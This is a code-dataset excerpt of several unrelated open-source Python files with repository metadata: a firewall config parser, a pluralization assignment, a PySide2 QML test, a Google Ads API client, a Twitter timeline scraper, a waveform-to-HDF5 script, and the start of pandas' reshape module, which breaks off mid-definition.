main_grp.add_option('-d', '--delimiter', help='CSV delimiter (default ";")', default=';') main_grp.add_option('-e', '--encoding', help='Input file encoding (default "utf8")', default='utf8') parser.option_groups.extend([main_grp]) # Python 2 and 3 compatibility if (sys.version_info < (3, 0)): fd_read_options = 'r' fd_write_options = 'wb' else: fd_read_options = 'r' fd_write_options = 'w' # Handful patterns # -- Entering address definition block p_entering_address_block = re.compile(r'^\s*config firewall address$', re.IGNORECASE) # -- Exiting address definition block p_exiting_address_block = re.compile(r'^end$', re.IGNORECASE) # -- Commiting the current address definition and going to the next one p_address_next = re.compile(r'^next$', re.IGNORECASE) # -- Policy number p_address_name = re.compile(r'^\s*edit\s+"(?P<address_name>.*)"$', re.IGNORECASE) # -- Policy setting p_address_set = re.compile(r'^\s*set\s+(?P<address_key>\S+)\s+(?P<address_value>.*)$', re.IGNORECASE) # Functions def parse(options): """ Parse the data according to several regexes @param options: options @rtype: return a list of addresses ( [ {'id' : '1', 'srcintf' : 'internal', ...}, {'id' : '2', 'srcintf' : 'external', ...}, ... ] ) and the list of unique seen keys ['id', 'srcintf', 'dstintf', ...] 
""" global p_entering_address_block, p_exiting_address_block, p_address_next, p_address_name, p_address_set in_address_block = False address_list = [] address_elem = {} order_keys = [] with io.open(options.input_file, mode=fd_read_options, encoding=options.encoding) as fd_input: for line in fd_input: line = line.strip() # We match a address block if p_entering_address_block.search(line): in_address_block = True # We are in a address block if in_address_block: if p_address_name.search(line): address_name = p_address_name.search(line).group('address_name') address_elem['name'] = address_name if not('name' in order_keys): order_keys.append('name') # We match a setting if p_address_set.search(line): address_key = p_address_set.search(line).group('address_key') if not(address_key in order_keys): order_keys.append(address_key) address_value = p_address_set.search(line).group('address_value').strip() address_value = re.sub('["]', '', address_value) address_elem[address_key] = address_value # We are done with the current address id if p_address_next.search(line): address_list.append(address_elem) address_elem = {} # We are exiting the address block if p_exiting_address_block.search(line): in_address_block = False return (address_list, order_keys) def generate_csv(results, keys, options): """ Generate a plain csv file """ if results and keys: with io.open(options.output_file, mode=fd_write_options) as fd_output: spamwriter = csv.writer(fd_output, delimiter=options.delimiter, quoting=csv.QUOTE_ALL, lineterminator='\n') if not(options.skip_header): spamwriter.writerow(keys) for address in results: output_line = [] for key in keys: if key in address.keys(): output_line.append(address[key]) else: output_line.append('') spamwriter.writerow(output_line) if options.newline: spamwriter.writerow('') fd_output.close() return None def main(): """ Dat main """ global parser options, arguments = parser.parse_args() if (options.input_file == None): parser.error('Please specify a valid input file') results, keys = parse(options) generate_csv(results, keys, options) return None if __name__ == "__main__" : main()
gpl-3.0
7,071,415,867,654,911,000
35.04
165
0.595465
false
3.956085
false
false
false
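Most of the work in the record above is done by a handful of regexes over the "config firewall address" block. A hedged sketch of the two per-entry patterns applied to sample lines; the sample config lines are made up:

# Hedged sketch exercising the module-level regexes defined above.
line_edit = '    edit "internal-net"'
line_set = '        set subnet 10.0.0.0 255.255.255.0'

print(p_address_name.search(line_edit).group('address_name'))   # internal-net
m = p_address_set.search(line_set)
print(m.group('address_key'), m.group('address_value'))         # subnet 10.0.0.0 255.255.255.0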
s5brown/MLfeatures
assignment_1_Sebastian_Brown.py
1
3964
"""Assignment 1.""" from assignment_1_eval import pairs vowels = ['a', 'e', 'i', 'o', 'u'] es_sounds = ['ch', 's', 'z'] no_change = [ 'economics', 'mathematics', 'statistics', 'luggage', 'baggage', 'furniture', 'information', 'gymnastics', 'news'] always_singular = ['fish', 'barracks', 'deer', 'sheep'] def pluralize(sg): """Return list of plural form(s) of input_word. Building this function is the purpose of Assignment 1. The most basic case is already provided. """ # print('Enter word to be made plural: ') plurals = [] if sg in no_change: plurals.append('') elif sg in always_singular: plurals.append(sg) elif sg == 'tooth': plurals.append('teeth') elif sg == 'goose': plurals.append('geese') elif sg == 'child': plurals.append('children') elif sg == 'foot': plurals.append('feet') elif sg == 'man': plurals.append('men') elif sg == 'woman': plurals.append('women') elif sg == 'person': plurals.append('people') elif sg == 'mouse': plurals.append('mice') elif sg == 'corpus': plurals.append(sg.replace(sg[-2:], 'ora')) elif sg == 'genus': plurals.append(sg.replace(sg[-2:], 'era')) elif sg.endswith('a'): plurals.append(sg + 'e') plurals.append(sg + 's') elif sg == 'crisis': plurals.append('crises') elif sg.endswith('us'): plurals.append(sg.replace(sg[-2:], 'i')) plurals.append(sg + 'es') elif sg.endswith('ex'): plurals.append(sg.replace(sg[-2:], 'ices')) plurals.append(sg + 'es') elif sg.endswith('x'): plurals.append(sg.replace(sg[-1], 'ces')) plurals.append(sg + 'es') elif sg.endswith('um'): plurals.append(sg.replace(sg[-2:], 'a')) plurals.append(sg + 's') elif sg.endswith('on'): plurals.append(sg.replace(sg[-2:], 'a')) elif sg.endswith('is'): plurals.append(sg.replace(sg[-2:], 'es')) elif sg.endswith('oo'): plurals.append(sg + 's') elif sg.endswith('o') and sg != 'auto': plurals.append(sg + 'es') plurals.append(sg + 's') elif sg.endswith('y') and sg[-2] in vowels: plurals.append(sg + 's') elif sg.endswith('y'): plurals.append(sg.replace(sg[-1], 'ies')) # NOTE I had to add parentheses to the following two lines to make the interpreter keep reading the next line. elif (sg.endswith(es_sounds[0]) or sg.endswith(es_sounds[1]) or sg.endswith(es_sounds[2])): plurals.append(sg + 'es') elif sg.endswith('f'): plurals.append(sg.replace(sg[-1], 'ves')) elif sg.endswith('fe'): plurals.append(sg.replace(sg[-2:], 'ves')) else: plurals.append(sg + 's') return plurals def singularize(sg): """Return list of plural form(s) of input_word. Building this function is the purpose of Assignment 1. The most basic case is already provided. """ # print("Enter word to be made singular: ") plurals = [] return plurals def evaluate(pl_func=pluralize, pair_data=pairs): """Evaluate the performance of pluralize function based on pairs data. pl_func -- function that pluralizes input word (default=pluralize) pair_data -- list of 2-tuples: [(sg1, pl1), (sg2, pl2),...] (default=pairs) """ total = len(pair_data) # Determine how many lexemes have more than one plural form. # duplicates = len(set([i for i, j in pair_data])) correct = 0 for sg, pl in pair_data: predicted_pl = pl_func(sg) if pl == predicted_pl or pl in predicted_pl: correct += 1 print('correct:', sg, predicted_pl, '({})'.format(pl), sep='\t') else: print('INcorrect:', sg, predicted_pl, '({})'.format(pl), sep='\t') print('Your score:', correct, '/', total, '{:.2%}'.format(correct / total)) evaluate()
gpl-3.0
-5,668,059,858,905,396,000
31.760331
114
0.573411
false
3.222764
false
false
false
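Because pluralize() in the record above returns a list of candidate plurals, the evaluator accepts an answer when the expected form is contained in that list. A few illustrative calls and the lists they produce:

# Hedged examples of the pluralize() behaviour implemented above.
print(pluralize('city'))     # ['cities']             y after a consonant
print(pluralize('boy'))      # ['boys']               y after a vowel
print(pluralize('cactus'))   # ['cacti', 'cactuses']  both candidates kept
print(pluralize('sheep'))    # ['sheep']              always_singular entry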
qtproject/pyside-pyside
tests/QtQml/registertype.py
1
3725
############################################################################# ## ## Copyright (C) 2016 The Qt Company Ltd. ## Contact: https://www.qt.io/licensing/ ## ## This file is part of the test suite of PySide2. ## ## $QT_BEGIN_LICENSE:GPL-EXCEPT$ ## Commercial License Usage ## Licensees holding valid commercial Qt licenses may use this file in ## accordance with the commercial license agreement provided with the ## Software or, alternatively, in accordance with the terms contained in ## a written agreement between you and The Qt Company. For licensing terms ## and conditions see https://www.qt.io/terms-conditions. For further ## information use the contact form at https://www.qt.io/contact-us. ## ## GNU General Public License Usage ## Alternatively, this file may be used under the terms of the GNU ## General Public License version 3 as published by the Free Software ## Foundation with exceptions as appearing in the file LICENSE.GPL3-EXCEPT ## included in the packaging of this file. Please review the following ## information to ensure the GNU General Public License requirements will ## be met: https://www.gnu.org/licenses/gpl-3.0.html. ## ## $QT_END_LICENSE$ ## ############################################################################# import sys import unittest import helper from PySide2.QtCore import Property, QTimer, QUrl from PySide2.QtGui import QGuiApplication, QPen, QColor, QPainter from PySide2.QtQml import qmlRegisterType, ListProperty from PySide2.QtQuick import QQuickView, QQuickItem, QQuickPaintedItem class PieSlice (QQuickPaintedItem): def __init__(self, parent = None): QQuickPaintedItem.__init__(self, parent) self._color = QColor() self._fromAngle = 0 self._angleSpan = 0 def getColor(self): return self._color def setColor(self, value): self._color = value def getFromAngle(self): return self._angle def setFromAngle(self, value): self._fromAngle = value def getAngleSpan(self): return self._angleSpan def setAngleSpan(self, value): self._angleSpan = value color = Property(QColor, getColor, setColor) fromAngle = Property(int, getFromAngle, setFromAngle) angleSpan = Property(int, getAngleSpan, setAngleSpan) def paint(self, painter): global paintCalled pen = QPen(self._color, 2) painter.setPen(pen); painter.setRenderHints(QPainter.Antialiasing, True); painter.drawPie(self.boundingRect(), self._fromAngle * 16, self._angleSpan * 16); paintCalled = True class PieChart (QQuickItem): def __init__(self, parent = None): QQuickItem.__init__(self, parent) self._name = '' self._slices = [] def getName(self): return self._name def setName(self, value): self._name = value name = Property(str, getName, setName) def appendSlice(self, _slice): global appendCalled _slice.setParentItem(self) self._slices.append(_slice) appendCalled = True slices = ListProperty(PieSlice, append=appendSlice) appendCalled = False paintCalled = False class TestQmlSupport(unittest.TestCase): def testIt(self): app = QGuiApplication([]) qmlRegisterType(PieChart, 'Charts', 1, 0, 'PieChart'); qmlRegisterType(PieSlice, "Charts", 1, 0, "PieSlice"); view = QQuickView() view.setSource(QUrl.fromLocalFile(helper.adjust_filename('registertype.qml', __file__))) view.show() QTimer.singleShot(250, view.close) app.exec_() self.assertTrue(appendCalled) self.assertTrue(paintCalled) if __name__ == '__main__': unittest.main()
lgpl-2.1
2,296,957,859,559,989,800
30.567797
96
0.651812
false
3.888309
true
false
false
googleapis/googleapis-gen
google/ads/googleads/v8/googleads-py/google/ads/googleads/v8/services/services/campaign_simulation_service/client.py
1
19104
# -*- coding: utf-8 -*- # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # from collections import OrderedDict from distutils import util import os import re from typing import Callable, Dict, Optional, Sequence, Tuple, Type, Union import pkg_resources from google.api_core import client_options as client_options_lib # type: ignore from google.api_core import exceptions as core_exceptions # type: ignore from google.api_core import gapic_v1 # type: ignore from google.api_core import retry as retries # type: ignore from google.auth import credentials as ga_credentials # type: ignore from google.auth.transport import mtls # type: ignore from google.auth.transport.grpc import SslCredentials # type: ignore from google.auth.exceptions import MutualTLSChannelError # type: ignore from google.oauth2 import service_account # type: ignore from google.ads.googleads.v8.common.types import simulation from google.ads.googleads.v8.enums.types import simulation_modification_method from google.ads.googleads.v8.enums.types import simulation_type from google.ads.googleads.v8.resources.types import campaign_simulation from google.ads.googleads.v8.services.types import campaign_simulation_service from .transports.base import CampaignSimulationServiceTransport, DEFAULT_CLIENT_INFO from .transports.grpc import CampaignSimulationServiceGrpcTransport class CampaignSimulationServiceClientMeta(type): """Metaclass for the CampaignSimulationService client. This provides class-level methods for building and retrieving support objects (e.g. transport) without polluting the client instance objects. """ _transport_registry = OrderedDict() # type: Dict[str, Type[CampaignSimulationServiceTransport]] _transport_registry['grpc'] = CampaignSimulationServiceGrpcTransport def get_transport_class(cls, label: str = None, ) -> Type[CampaignSimulationServiceTransport]: """Return an appropriate transport class. Args: label: The name of the desired transport. If none is provided, then the first transport in the registry is used. Returns: The transport class to use. """ # If a specific transport is requested, return that one. if label: return cls._transport_registry[label] # No transport is requested; return the default (that is, the first one # in the dictionary). return next(iter(cls._transport_registry.values())) class CampaignSimulationServiceClient(metaclass=CampaignSimulationServiceClientMeta): """Service to fetch campaign simulations.""" @staticmethod def _get_default_mtls_endpoint(api_endpoint): """Convert api endpoint to mTLS endpoint. Convert "*.sandbox.googleapis.com" and "*.googleapis.com" to "*.mtls.sandbox.googleapis.com" and "*.mtls.googleapis.com" respectively. Args: api_endpoint (Optional[str]): the api endpoint to convert. Returns: str: converted mTLS api endpoint. """ if not api_endpoint: return api_endpoint mtls_endpoint_re = re.compile( r"(?P<name>[^.]+)(?P<mtls>\.mtls)?(?P<sandbox>\.sandbox)?(?P<googledomain>\.googleapis\.com)?" 
) m = mtls_endpoint_re.match(api_endpoint) name, mtls, sandbox, googledomain = m.groups() if mtls or not googledomain: return api_endpoint if sandbox: return api_endpoint.replace( "sandbox.googleapis.com", "mtls.sandbox.googleapis.com" ) return api_endpoint.replace(".googleapis.com", ".mtls.googleapis.com") DEFAULT_ENDPOINT = 'googleads.googleapis.com' DEFAULT_MTLS_ENDPOINT = _get_default_mtls_endpoint.__func__( # type: ignore DEFAULT_ENDPOINT ) @classmethod def from_service_account_info(cls, info: dict, *args, **kwargs): """Creates an instance of this client using the provided credentials info. Args: info (dict): The service account private key info. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: CampaignSimulationServiceClient: The constructed client. """ credentials = service_account.Credentials.from_service_account_info(info) kwargs["credentials"] = credentials return cls(*args, **kwargs) @classmethod def from_service_account_file(cls, filename: str, *args, **kwargs): """Creates an instance of this client using the provided credentials file. Args: filename (str): The path to the service account private key json file. args: Additional arguments to pass to the constructor. kwargs: Additional arguments to pass to the constructor. Returns: CampaignSimulationServiceClient: The constructed client. """ credentials = service_account.Credentials.from_service_account_file( filename) kwargs['credentials'] = credentials return cls(*args, **kwargs) from_service_account_json = from_service_account_file @property def transport(self) -> CampaignSimulationServiceTransport: """Return the transport used by the client instance. Returns: CampaignSimulationServiceTransport: The transport used by the client instance. 
""" return self._transport @staticmethod def campaign_simulation_path(customer_id: str,campaign_id: str,type: str,modification_method: str,start_date: str,end_date: str,) -> str: """Return a fully-qualified campaign_simulation string.""" return "customers/{customer_id}/campaignSimulations/{campaign_id}~{type}~{modification_method}~{start_date}~{end_date}".format(customer_id=customer_id, campaign_id=campaign_id, type=type, modification_method=modification_method, start_date=start_date, end_date=end_date, ) @staticmethod def parse_campaign_simulation_path(path: str) -> Dict[str,str]: """Parse a campaign_simulation path into its component segments.""" m = re.match(r"^customers/(?P<customer_id>.+?)/campaignSimulations/(?P<campaign_id>.+?)~(?P<type>.+?)~(?P<modification_method>.+?)~(?P<start_date>.+?)~(?P<end_date>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_billing_account_path(billing_account: str, ) -> str: """Return a fully-qualified billing_account string.""" return "billingAccounts/{billing_account}".format(billing_account=billing_account, ) @staticmethod def parse_common_billing_account_path(path: str) -> Dict[str,str]: """Parse a billing_account path into its component segments.""" m = re.match(r"^billingAccounts/(?P<billing_account>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_folder_path(folder: str, ) -> str: """Return a fully-qualified folder string.""" return "folders/{folder}".format(folder=folder, ) @staticmethod def parse_common_folder_path(path: str) -> Dict[str,str]: """Parse a folder path into its component segments.""" m = re.match(r"^folders/(?P<folder>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_organization_path(organization: str, ) -> str: """Return a fully-qualified organization string.""" return "organizations/{organization}".format(organization=organization, ) @staticmethod def parse_common_organization_path(path: str) -> Dict[str,str]: """Parse a organization path into its component segments.""" m = re.match(r"^organizations/(?P<organization>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_project_path(project: str, ) -> str: """Return a fully-qualified project string.""" return "projects/{project}".format(project=project, ) @staticmethod def parse_common_project_path(path: str) -> Dict[str,str]: """Parse a project path into its component segments.""" m = re.match(r"^projects/(?P<project>.+?)$", path) return m.groupdict() if m else {} @staticmethod def common_location_path(project: str, location: str, ) -> str: """Return a fully-qualified location string.""" return "projects/{project}/locations/{location}".format(project=project, location=location, ) @staticmethod def parse_common_location_path(path: str) -> Dict[str,str]: """Parse a location path into its component segments.""" m = re.match(r"^projects/(?P<project>.+?)/locations/(?P<location>.+?)$", path) return m.groupdict() if m else {} def __init__(self, *, credentials: Optional[ga_credentials.Credentials] = None, transport: Union[str, CampaignSimulationServiceTransport, None] = None, client_options: Optional[client_options_lib.ClientOptions] = None, client_info: gapic_v1.client_info.ClientInfo = DEFAULT_CLIENT_INFO, ) -> None: """Instantiate the campaign simulation service client. Args: credentials (Optional[google.auth.credentials.Credentials]): The authorization credentials to attach to requests. 
These credentials identify the application to the service; if none are specified, the client will attempt to ascertain the credentials from the environment. transport (Union[str, ~.CampaignSimulationServiceTransport]): The transport to use. If set to None, a transport is chosen automatically. client_options (google.api_core.client_options.ClientOptions): Custom options for the client. It won't take effect if a ``transport`` instance is provided. (1) The ``api_endpoint`` property can be used to override the default endpoint provided by the client. GOOGLE_API_USE_MTLS_ENDPOINT environment variable can also be used to override the endpoint: "always" (always use the default mTLS endpoint), "never" (always use the default regular endpoint) and "auto" (auto switch to the default mTLS endpoint if client certificate is present, this is the default value). However, the ``api_endpoint`` property takes precedence if provided. (2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable is "true", then the ``client_cert_source`` property can be used to provide client certificate for mutual TLS transport. If not provided, the default SSL client certificate will be used if present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not set, no client certificate will be used. client_info (google.api_core.gapic_v1.client_info.ClientInfo): The client info used to send a user-agent string along with API requests. If ``None``, then default info will be used. Generally, you only need to set this if you're developing your own client library. Raises: google.auth.exceptions.MutualTLSChannelError: If mutual TLS transport creation failed for any reason. """ if isinstance(client_options, dict): client_options = client_options_lib.from_dict(client_options) if client_options is None: client_options = client_options_lib.ClientOptions() # Create SSL credentials for mutual TLS if needed. use_client_cert = bool(util.strtobool(os.getenv("GOOGLE_API_USE_CLIENT_CERTIFICATE", "false"))) ssl_credentials = None is_mtls = False if use_client_cert: if client_options.client_cert_source: import grpc # type: ignore cert, key = client_options.client_cert_source() ssl_credentials = grpc.ssl_channel_credentials( certificate_chain=cert, private_key=key ) is_mtls = True else: creds = SslCredentials() is_mtls = creds.is_mtls ssl_credentials = creds.ssl_credentials if is_mtls else None # Figure out which api endpoint to use. if client_options.api_endpoint is not None: api_endpoint = client_options.api_endpoint else: use_mtls_env = os.getenv("GOOGLE_API_USE_MTLS_ENDPOINT", "auto") if use_mtls_env == "never": api_endpoint = self.DEFAULT_ENDPOINT elif use_mtls_env == "always": api_endpoint = self.DEFAULT_MTLS_ENDPOINT elif use_mtls_env == "auto": api_endpoint = self.DEFAULT_MTLS_ENDPOINT if is_mtls else self.DEFAULT_ENDPOINT else: raise MutualTLSChannelError( "Unsupported GOOGLE_API_USE_MTLS_ENDPOINT value. Accepted values: never, auto, always" ) # Save or instantiate the transport. # Ordinarily, we provide the transport, but allowing a custom transport # instance provides an extensibility point for unusual situations. if isinstance(transport, CampaignSimulationServiceTransport): # transport is a CampaignSimulationServiceTransport instance. 
if credentials: raise ValueError('When providing a transport instance, ' 'provide its credentials directly.') self._transport = transport elif isinstance(transport, str): Transport = type(self).get_transport_class(transport) self._transport = Transport( credentials=credentials, host=self.DEFAULT_ENDPOINT ) else: self._transport = CampaignSimulationServiceGrpcTransport( credentials=credentials, host=api_endpoint, ssl_channel_credentials=ssl_credentials, client_info=client_info, ) def get_campaign_simulation(self, request: campaign_simulation_service.GetCampaignSimulationRequest = None, *, resource_name: str = None, retry: retries.Retry = gapic_v1.method.DEFAULT, timeout: float = None, metadata: Sequence[Tuple[str, str]] = (), ) -> campaign_simulation.CampaignSimulation: r"""Returns the requested campaign simulation in full detail. Args: request (:class:`google.ads.googleads.v8.services.types.GetCampaignSimulationRequest`): The request object. Request message for [CampaignSimulationService.GetCampaignSimulation][google.ads.googleads.v8.services.CampaignSimulationService.GetCampaignSimulation]. resource_name (:class:`str`): Required. The resource name of the campaign simulation to fetch. This corresponds to the ``resource_name`` field on the ``request`` instance; if ``request`` is provided, this should not be set. retry (google.api_core.retry.Retry): Designation of what errors, if any, should be retried. timeout (float): The timeout for this request. metadata (Sequence[Tuple[str, str]]): Strings which should be sent along with the request as metadata. Returns: google.ads.googleads.v8.resources.types.CampaignSimulation: A campaign simulation. Supported combinations of advertising channel type, simulation type and simulation modification method is detailed below respectively. SEARCH - CPC_BID - UNIFORM SEARCH - CPC_BID - SCALING SEARCH - TARGET_CPA - UNIFORM SEARCH - TARGET_CPA - SCALING SEARCH - TARGET_ROAS - UNIFORM SEARCH - TARGET_IMPRESSION_SHARE - UNIFORM SEARCH - BUDGET - UNIFORM SHOPPING - BUDGET - UNIFORM SHOPPING - TARGET_ROAS - UNIFORM MULTIPLE - TARGET_CPA - UNIFORM OWNED_AND_OPERATED - TARGET_CPA - DEFAULT DISPLAY - TARGET_CPA - UNIFORM """ # Create or coerce a protobuf request object. # Sanity check: If we got a request object, we should *not* have # gotten any keyword arguments that map to the request. if request is not None and any([resource_name]): raise ValueError('If the `request` argument is set, then none of ' 'the individual field arguments should be set.') # Minor optimization to avoid making a copy if the user passes # in a campaign_simulation_service.GetCampaignSimulationRequest. # There's no risk of modifying the input as we've already verified # there are no flattened fields. if not isinstance(request, campaign_simulation_service.GetCampaignSimulationRequest): request = campaign_simulation_service.GetCampaignSimulationRequest(request) # If we have keyword arguments corresponding to fields on the # request, apply these. if resource_name is not None: request.resource_name = resource_name # Wrap the RPC method; this adds retry and timeout information, # and friendly error handling. rpc = self._transport._wrapped_methods[self._transport.get_campaign_simulation] # Certain fields should be provided within the metadata header; # add these here. metadata = tuple(metadata) + ( gapic_v1.routing_header.to_grpc_metadata(( ('resource_name', request.resource_name), )), ) # Send the request. 
response = rpc( request, retry=retry, timeout=timeout, metadata=metadata, ) # Done; return the response. return response __all__ = ( 'CampaignSimulationServiceClient', )
apache-2.0
-7,526,720,101,945,983,000
45.144928
280
0.63505
false
4.535613
false
false
false
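A minimal usage sketch for the CampaignSimulationServiceClient defined in the record above. The import path, key-file name, and every ID below are placeholders rather than values taken from this record, and a production call would normally go through the wider google-ads client so that developer-token and login-customer-id headers are attached; this only exercises the methods visible in the generated class.

# Hypothetical usage of the generated client above; import path, key file and IDs are placeholders.
from google.ads.googleads.v8.services.services.campaign_simulation_service import (
    CampaignSimulationServiceClient,  # assumed module location for the class shown above
)

# Build a client from a service-account key file (classmethod defined in the record above).
client = CampaignSimulationServiceClient.from_service_account_file("service_account_key.json")

# Compose the resource name with the path helper on the client, then fetch the simulation.
resource_name = client.campaign_simulation_path(
    customer_id="1234567890",
    campaign_id="987654",
    type="TARGET_CPA",
    modification_method="UNIFORM",
    start_date="2021-01-01",
    end_date="2021-01-31",
)
simulation = client.get_campaign_simulation(resource_name=resource_name)
print(simulation)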
bmd/twittrscrapr
twittrscrapr/scrapers/timelinescrapr.py
1
1459
import logging from ..parsers import DictParser from base_scraper import TwittrScrapr log = logging.getLogger('scrapers.TimelineScrapr') class TimelineScrapr(TwittrScrapr): def __init__(self, api_keys, writer): super(TimelineScrapr, self).__init__(api_keys, writer) def _fetch_user_timeline(self, user): finished_pagination = False new_max = None results = [] parser = DictParser() while not finished_pagination: self.check_rate_limit() call_result = self.api.get_user_timeline(screen_name=user, count=200, include_rts=1, trim_user=True, max_id=new_max) if len(call_result) > 0: results.extend([parser.parse(t, user=user) for t in call_result]) new_max = str(int(call_result[-1]['id_str']) - 1) else: finished_pagination = True self.reset_time = self.api.get_lastfunction_header('x-rate-limit-reset') self.calls_remaining = self.api.get_lastfunction_header('x-rate-limit-remaining') return results @TwittrScrapr.error_handler def fetch_user_statuses(self, writer): for user in self.scrape_queue: log.info('Fetching tweets for {}'.format(user)) res = self._fetch_user_timeline(user) log.info('Got {} tweets'.format(len(res))) writer.writerows(res)
mit
-2,145,231,821,339,842,000
33.738095
112
0.592872
false
3.741026
false
false
false
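A sketch of how the TimelineScrapr in the record above might be driven. The TwittrScrapr base class, the scrape_queue attribute, the import path, and the CSV column names are assumptions inferred from the methods used in this record; they live in files that are not part of this record, so treat this only as an illustration of the call sequence.

# Hypothetical driver for TimelineScrapr; credentials, queue handling and CSV columns are placeholders.
import csv
import logging

from twittrscrapr.scrapers.timelinescrapr import TimelineScrapr  # assumed import path

logging.basicConfig(level=logging.INFO)

api_keys = {
    "app_key": "...",
    "app_secret": "...",
    "oauth_token": "...",
    "oauth_token_secret": "...",
}

with open("tweets.csv", "w") as fh:
    writer = csv.DictWriter(fh, fieldnames=["user", "id_str", "created_at", "text"])
    writer.writeheader()
    scraper = TimelineScrapr(api_keys, writer)
    scraper.scrape_queue = ["jack", "twitterdev"]  # assumed: normally populated via the base class
    scraper.fetch_user_statuses(writer)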
astroclark/BayesSpec
waveforms/waveforms2hdf5.py
1
1186
#!/usr/bin/env python """ waveforms2hdf5.py loops over the list of waveforms defined in this script and dumps out an hdf5 file for the plus polarisation. The idea is to then compute the Shannon entropy of the waveforms using Matlab's wentropy.m function. """ import h5py import numpy as np import pmns_utils wfs='/Users/jclark/hmns_repo/results/penultimate_waveforms.txt' waveform_list=np.loadtxt(wfs,dtype=str) #waveform_list=['shen_135135_lessvisc','apr_135135'] h5_file=h5py.File('waveforms.hdf5','w') h5_snr_file=h5py.File('snr.hdf5','w') for waveform in waveform_list: # Generate waveform instance wf=pmns_utils.Waveform(waveform) # Compute the time series & SNR wf.make_wf_timeseries() wf.compute_characteristics() # Zoom in on signal peak_idx=np.argmax(wf.hplus.data.data) wf_start_idx=np.argwhere(abs(wf.hplus.data.data)>0)[0] wf_end_idx=np.argwhere(abs(wf.hplus.data.data)>0)[-1] wf_reduced = wf.hplus.data.data[wf_start_idx:wf_end_idx] h5_file[waveform] = wf_reduced h5_snr_file[waveform] = wf.snr_plus #h5_file[waveform]=wf_reduced #h5_file[waveform+'_snr']=wf.snr_plus h5_file.close() h5_snr_file.close()
gpl-2.0
-5,496,950,762,767,886,000
29.410256
78
0.713322
false
2.653244
false
false
false
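The docstring in the record above says the dumped waveforms are meant to be fed to Matlab's wentropy. A plain-Python equivalent of that follow-on step is sketched below; the histogram-based estimator and the bin count are choices made here for illustration, not something taken from the repository.

# Read back waveforms.hdf5 (written by the script above) and report a Shannon entropy
# per waveform. The binning scheme is an assumption standing in for Matlab's wentropy.
import h5py
import numpy as np

def shannon_entropy(x, nbins=64):
    """Histogram-based Shannon entropy (in bits) of a 1-D waveform."""
    counts, _ = np.histogram(x, bins=nbins)
    p = counts / counts.sum()
    p = p[p > 0]
    return -np.sum(p * np.log2(p))

with h5py.File("waveforms.hdf5", "r") as f:
    for name in f:
        print(name, shannon_entropy(f[name][()]))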
Ziqi-Li/bknqgis
pandas/pandas/core/reshape/reshape.py
1
45812
# pylint: disable=E1101,E1103 # pylint: disable=W0703,W0622,W0613,W0201 from pandas.compat import range, zip from pandas import compat import itertools import re import numpy as np from pandas.core.dtypes.common import ( _ensure_platform_int, is_list_like, is_bool_dtype, needs_i8_conversion) from pandas.core.dtypes.cast import maybe_promote from pandas.core.dtypes.missing import notna import pandas.core.dtypes.concat as _concat from pandas.core.series import Series from pandas.core.frame import DataFrame from pandas.core.sparse.api import SparseDataFrame, SparseSeries from pandas.core.sparse.array import SparseArray from pandas._libs.sparse import IntIndex from pandas.core.categorical import Categorical, _factorize_from_iterable from pandas.core.sorting import (get_group_index, get_compressed_ids, compress_group_index, decons_obs_group_ids) import pandas.core.algorithms as algos from pandas._libs import algos as _algos, reshape as _reshape from pandas.core.frame import _shared_docs from pandas.util._decorators import Appender from pandas.core.index import MultiIndex, _get_na_value class _Unstacker(object): """ Helper class to unstack data / pivot with multi-level index Parameters ---------- level : int or str, default last level Level to "unstack". Accepts a name for the level. Examples -------- >>> import pandas as pd >>> index = pd.MultiIndex.from_tuples([('one', 'a'), ('one', 'b'), ... ('two', 'a'), ('two', 'b')]) >>> s = pd.Series(np.arange(1, 5, dtype=np.int64), index=index) >>> s one a 1 b 2 two a 3 b 4 dtype: int64 >>> s.unstack(level=-1) a b one 1 2 two 3 4 >>> s.unstack(level=0) one two a 1 3 b 2 4 Returns ------- unstacked : DataFrame """ def __init__(self, values, index, level=-1, value_columns=None, fill_value=None): self.is_categorical = None if values.ndim == 1: if isinstance(values, Categorical): self.is_categorical = values values = np.array(values) values = values[:, np.newaxis] self.values = values self.value_columns = value_columns self.fill_value = fill_value if value_columns is None and values.shape[1] != 1: # pragma: no cover raise ValueError('must pass column labels for multi-column data') self.index = index if isinstance(self.index, MultiIndex): if index._reference_duplicate_name(level): msg = ("Ambiguous reference to {0}. 
The index " "names are not unique.".format(level)) raise ValueError(msg) self.level = self.index._get_level_number(level) # when index includes `nan`, need to lift levels/strides by 1 self.lift = 1 if -1 in self.index.labels[self.level] else 0 self.new_index_levels = list(index.levels) self.new_index_names = list(index.names) self.removed_name = self.new_index_names.pop(self.level) self.removed_level = self.new_index_levels.pop(self.level) self._make_sorted_values_labels() self._make_selectors() def _make_sorted_values_labels(self): v = self.level labs = list(self.index.labels) levs = list(self.index.levels) to_sort = labs[:v] + labs[v + 1:] + [labs[v]] sizes = [len(x) for x in levs[:v] + levs[v + 1:] + [levs[v]]] comp_index, obs_ids = get_compressed_ids(to_sort, sizes) ngroups = len(obs_ids) indexer = _algos.groupsort_indexer(comp_index, ngroups)[0] indexer = _ensure_platform_int(indexer) self.sorted_values = algos.take_nd(self.values, indexer, axis=0) self.sorted_labels = [l.take(indexer) for l in to_sort] def _make_selectors(self): new_levels = self.new_index_levels # make the mask remaining_labels = self.sorted_labels[:-1] level_sizes = [len(x) for x in new_levels] comp_index, obs_ids = get_compressed_ids(remaining_labels, level_sizes) ngroups = len(obs_ids) comp_index = _ensure_platform_int(comp_index) stride = self.index.levshape[self.level] + self.lift self.full_shape = ngroups, stride selector = self.sorted_labels[-1] + stride * comp_index + self.lift mask = np.zeros(np.prod(self.full_shape), dtype=bool) mask.put(selector, True) if mask.sum() < len(self.index): raise ValueError('Index contains duplicate entries, ' 'cannot reshape') self.group_index = comp_index self.mask = mask self.unique_groups = obs_ids self.compressor = comp_index.searchsorted(np.arange(ngroups)) def 